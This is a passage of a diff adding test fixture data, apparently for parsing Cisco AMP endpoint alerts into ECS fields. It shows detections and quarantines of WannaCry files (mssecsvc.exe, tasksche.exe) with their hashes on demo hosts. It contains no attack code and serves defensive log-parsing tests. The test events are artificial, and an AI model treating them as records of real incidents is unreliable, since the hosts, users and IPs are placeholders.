+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094074914Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419214500913742000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.24D004A104-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419214500913741855",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094076786Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419214500913742000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419214500913741857",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094078741Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419214500913742000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.24D004A104-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419214500913741856",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094080611Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419214500913742000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419214500913741856",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:43:30.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094082470Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419214492323807000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419214488028839966",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 5580,
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "@timestamp": "2021-01-14T13:43:29.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094084360Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419214488028840000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419214488028839966",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:29:36.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094086254Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T13:29:36.000Z",
+                "action": "Potential Dropper Infection",
+                "id": "14945890085425",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296257
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:28:09.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:10.094088127Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6412574627503014000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:19.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094089991Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204910251770000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
